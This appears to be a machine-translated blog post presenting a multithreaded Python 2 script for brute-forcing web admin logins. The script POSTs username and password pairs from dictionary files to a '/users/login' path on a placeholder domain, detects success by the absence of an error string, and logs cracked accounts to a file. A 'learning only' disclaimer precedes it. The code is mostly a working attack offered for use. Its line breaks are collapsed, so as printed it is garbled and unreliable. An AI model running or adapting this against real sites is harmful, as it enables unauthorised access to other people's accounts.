Http background weak password cracking tool written in python

The weak password cracking tool in the http background written by python today comes to get a Python applet that is cracked in the background. haha, go directly to the code and make comments ~~

#-*-Coding: UTF-8-*-# It is more practical to use the multi-thread brute-force cracking background username + password (self-prepared Dictionary) written in python. even today, information security is so important, or some people do not add verification codes or abnormal access restrictions or other login verification methods, so it is very easy to be taken down by the weak password brute force tool (this code is only useful for learning and prohibiting web attacks, not legally liable) import urllib2import urllibimport httplibimport threading headers = {"Content-Type": "application/x-www-form-urlencoded", "Connection ": "Keep-Alive", "Referer ":" http://www.xxxxx.com/ "}; # Referer: the access source address of the proxy # lock = threading. lock () def tryUser (user, password): # print user, password global headers global outFile conn = httplib. HTTPConnection ("www.xxxxx.com") # remote domain name if len (user) <3: # restrict the length of the user name, exclude useless data in the dictionary return # actively exit the thread else: # lock. acquire () # Multi-threaded file operation, lock in advance, release after use # line = inFile. readline () # userData = line. strip (). split ('#') # strip () removes spaces by default, including '', '\ t',' \ n', etc. # lock. release () user = u Ser. strip () passwd = password. strip () params = urllib. urlencode ({'username': user, 'password': passwd}) conn. request (method = "POST", url = "/users/login", body = params, headers = headers) # Background path responseText = conn. getresponse (). read (). decode ('utf8') # webpage code # print responseText # you can print it for the first time to see if it parses if not responseText. find (u'user name or password is incorrect. please enter it again! ')> 0: print' ----- find user: ', user,' with password: ', passwd,' ----- 'outfile. write (user + ''+ passwd + '\ n') return outFile = open('accounts-cracked.txt', 'w') if _ name _ = '_ main __': tsk = [] # Create a thread pool with open (r'user. dic', 'r') as fUser: # Use with as to open a file without closing the file yourself, because he will close it when appropriate (similar to using (...) in C (...) {} Interface) with open (r'pass. dic', 'r') as fPass: for user in fUser. readlines (): for password in fPass. readlines (): t = threading. thread (target = tryUser, args = (user, password) t. daemon = False # Do not set process daemon tsk. append (t) # t. start () fPass. seek (0) # remember to move the file back to the beginning of the file, otherwise the first entry that executes only the outer loop will appear, because the inner layer after # iteration (readlines () it is in the form of an iterator. after an iteration, the file pointer points to the end of the file, and the iterator # is also the end.) the second time there is no password in fPass, that is, for password in fPass. readlines (): # It is null, so the inner loop will not be executed here, so it is the problem of clearing the iterator (C ++ itertor often has) # join () if there is no parameter, the main thread is completely blocked. if there are parameters waiting for the thread to run, that is to say, # The main thread will not be blocked after waiting for one second. continue to execute the main thread, this means opening a thread in one second # you cannot call join () before thread start, because join () is scheduled for t in tsk: t. start () t. join (1) print "All thread OK, maybe not" outFile. close ()